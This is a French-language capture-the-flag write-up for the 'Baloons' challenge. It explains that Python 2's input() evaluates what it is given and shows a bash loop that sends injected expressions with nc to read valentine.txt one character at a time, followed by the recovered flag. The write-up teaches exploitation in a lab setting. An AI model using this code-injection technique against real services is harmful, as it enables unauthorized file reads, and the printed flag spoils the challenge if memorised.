# 01 Baloons

## Énoncé

Starting off with a bang (pop)! I ordered a bunch of Valentine's Day-themed balloons, and I'm so excited about them! Here's the portal I use to track my order.

Look for "valentine.txt."

Author: Manav (0xmmalik)

`nc 0.cloud.chals.io 34293`

Fichier fourni : [balloons.py](balloons.py)

## Solution

La fonction `input` de Python 2 évalue le code entré et renvoie le résultat de l'évaluation 
(le `input` de Python 3 ne fait pas ça...).

Exécuter le script bash suivant permet d'obtenir les codes ASCII des caractères dans le fichier `valentine.txt` :

```
u=0; while test $u -le 200; do echo "ord(open(\"valentine.txt\").read()[$u])" | nc 0.cloud.chals.io 34293 | grep -o '[0-9]*'; u=$[ $u + 1 ]; done
```

Un traitement ultérieur en Python donne le flag : 

```python
# Par exemple : 
"".join([chr(int(_)) for _ in s.splitlines()])
```

`valentine{0ops_i_go7_hydrog3n_ball00n5_NONOWHEREAREYOUGOINGWITHTHATLIGHTER}`

Le prog [`solve.py`](solve.py) réalise le tout (connexion socket, récupération des code caractère et construction du flag).




